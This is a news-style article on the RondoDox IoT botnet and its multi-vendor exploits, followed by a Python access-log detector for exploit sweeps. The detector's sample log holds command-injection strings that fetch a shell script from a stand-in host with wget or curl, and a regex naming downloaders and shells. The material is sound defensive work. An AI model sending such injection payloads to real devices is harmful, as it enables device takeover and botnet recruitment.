RondoDox Botnet Exploits 50+ Flaws in Devices

RondoDox Botnet Expands to 50+ Vulnerabilities

Researchers have warned that the RondoDox Botnet is becoming more dangerous than ever. It now exploits over 50 security flaws across more than 30 technology vendors.

This campaign uses what experts call an “exploit shotgun” approach. It targets many kinds of internet-connected devices, including routers, DVRs, NVRs, CCTV cameras, and web servers. Therefore, both home users and enterprises are at risk.

How the RondoDox Attacks Begin

Researchers first observed a RondoDox exploitation attempt on June 15, 2025. The attackers used CVE-2023-1389, a command-injection vulnerability in the web management interface of TP-Link Archer AX21 routers that was disclosed and patched in 2023, to gain an initial foothold.

However, this flaw is only one of dozens the botnet now abuses. Rather than tailoring each attack to one target, RondoDox fires its whole exploit set at any exposed device and keeps whatever lands, which lets it compromise devices from many vendors at scale.

From Single Device to Multi-Vector Threat

Originally, RondoDox focused on specific devices like digital video recorders and Four-Faith routers. The attackers used them to launch DDoS attacks over HTTP, UDP, and TCP protocols.

Now, the botnet has evolved. It uses a “loader-as-a-service” model in which the RondoDox dropper is bundled with, and delivers, other malware families such as Mirai and Morte. A single compromised device can therefore receive several payloads from one infection, and cleanup becomes harder because removing one family does not clear the others.

Dozens of Vendors Impacted

RondoDox currently weaponizes 56 vulnerabilities, including 18 without official CVE identifiers. These flaws affect devices from dozens of major vendors.

According to a recent report, the list includes D-Link, Linksys, NETGEAR, Cisco, QNAP, Zyxel, and many others. This variety shows how easily attackers can exploit outdated or poorly secured network devices.

Growing Botnet Activity Around the World

New intelligence reveals that RondoDox may be linked to other major botnets such as AISURU. These large-scale operations control hundreds of thousands of compromised IoT devices worldwide.

For example, AISURU is believed to draw its power from infected systems hosted on major U.S. networks. Meanwhile, RondoDox continues to spread through weak credentials and old unpatched flaws. Therefore, it represents a growing global cyber threat.

Coordinated Attacks Using Global Infrastructure

Recent data also shows over 100,000 unique IP addresses participating in coordinated botnet activity across more than 100 countries. Many attacks now target Remote Desktop Protocol (RDP) services in the U.S.

Researchers found that most participating IPs share a common TCP fingerprint, which suggests common tooling and central management rather than unrelated scanners. That structure lets the operators aim a large-scale attack at one target and move on quickly.

How to Prevent RondoDox Botnet Infections

To stop threats like RondoDox, organizations should update all IoT and network devices to the latest vendor firmware, and isolate or replace devices that are end-of-life and will never receive a fix. Disabling unused remote-management interfaces (especially WAN-facing HTTP, Telnet and SSH) and replacing default or shared passwords on routers, cameras and servers with strong, unique credentials removes both of the entry points this campaign relies on: unpatched flaws and weak logins.

Furthermore, managed threat detection can monitor abnormal traffic and block suspicious payloads automatically; for this campaign that means watching for exploit attempts against device management endpoints, and for outbound fetches of shell scripts or binaries from compromised devices. Network segmentation keeps IoT and embedded devices away from user workstations and servers, so an infected camera or DVR cannot be used as a launch point against the rest of the network, and intrusion prevention tools can isolate infected devices before they spread new payloads.
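The “exploit shotgun” pattern described earlier, and the monitoring advice above, can both be turned into a concrete check on web-server access logs. The following is an added example, not code from the original article or from any vendor report. It combines one named signature for the public request shape of CVE-2023-1389 (the TP-Link Archer AX21 locale form, whose `country` value reaches a shell), a generic shell-injection heuristic, and a behavioural score: one source firing injection payloads at several distinct endpoints inside a short window is flagged as a multi-exploit sweep rather than a lone probe. The log lines, the window and threshold values, and the non-TP-Link endpoint paths are constructed for the example and do not correspond to any real product.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote, unquote_plus, urlsplit

# Combined-log-format parser: source IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Public request shape of CVE-2023-1389: the locale form's 'country' value reaches a shell.
CVE_2023_1389_RE = re.compile(r'/cgi-bin/luci/;stok=/locale\?.*\bform=country\b')
# Generic injection indicators in a decoded path or query: command substitution,
# backticks, or a ';' / '|' chained straight into a downloader or shell.
INJECTION_RE = re.compile(r'\$\(|`|[;|]\s*(?:wget|curl|sh|busybox|nc)\b')

# Constructed sample traffic (RFC 5737 addresses). The /cgi-bin/dvr/... and
# /admin/net.cgi paths are placeholders, not real device endpoints.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Jun/2025:10:00:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://198.51.100.7/x.sh) HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.10 - - [15/Jun/2025:10:00:02 +0000] "GET /cgi-bin/dvr/config.cgi?ntp=;wget%20http://198.51.100.7/x.sh HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.10 - - [15/Jun/2025:10:00:03 +0000] "POST /admin/net.cgi?host=%60curl%20http://198.51.100.7/x.sh%60 HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.10 - - [15/Jun/2025:10:00:04 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id) HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.23 - - [15/Jun/2025:10:00:05 +0000] "GET /search?q=price%3B%20shipping HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [15/Jun/2025:10:00:06 +0000] "GET /static/app.js HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.77 - - [15/Jun/2025:10:05:00 +0000] "GET /cgi-bin/dvr/config.cgi?ntp=;sh%20-c%20id HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is not log-shaped."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        'ip': m['ip'],
        'ts': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
        'method': m['method'],
        'target': m['target'],
        'status': int(m['status']),
    }


def match_rules(target):
    """Return the set of rule names a request target trips; empty for benign traffic."""
    rules = set()
    if CVE_2023_1389_RE.search(target):
        rules.add('cve-2023-1389')
    parts = urlsplit(target)
    # Decode before matching so %60 / %3B / '+' encodings cannot hide the payload.
    decoded = unquote(parts.path) + '?' + unquote_plus(parts.query)
    if INJECTION_RE.search(decoded):
        rules.add('shell-injection')
    return rules


def shotgun_report(log_text, window_seconds=60, min_distinct_paths=3):
    """Per source IP: suspicious hits, most distinct endpoints hit inside one window,
    rules fired, and a 'shotgun' verdict (spraying payloads at >= min_distinct_paths
    different endpoints within window_seconds)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rules = match_rules(rec['target'])
        if rules:
            events[rec['ip']].append((rec['ts'], urlsplit(rec['target']).path, rules))
    report = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        best = 0
        for i, (t0, _, _) in enumerate(evs):
            # Distinct endpoints hit in the window starting at this event.
            in_window = {p for t, p, _ in evs[i:] if (t - t0).total_seconds() <= window_seconds}
            best = max(best, len(in_window))
        report[ip] = {
            'hits': len(evs),
            'distinct_paths': best,
            'rules': set().union(*(r for _, _, r in evs)),
            'shotgun': best >= min_distinct_paths,
        }
    return report


if __name__ == '__main__':
    for ip, row in shotgun_report(SAMPLE_LOG).items():
        print(ip, row)
```

On the sample, 203.0.113.10 trips both the named signature and the generic rule across three distinct endpoints within a minute and is reported as a shotgun source; 192.0.2.77 trips one rule against one endpoint and is reported but not flagged; the benign `price; shipping` search never matches because the heuristic only fires when the separator is followed by a downloader or shell name. In production the named-signature list would grow to cover each exploit the botnet is known to use, while the behavioural score keeps catching sweeps that use flaws without a signature yet.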
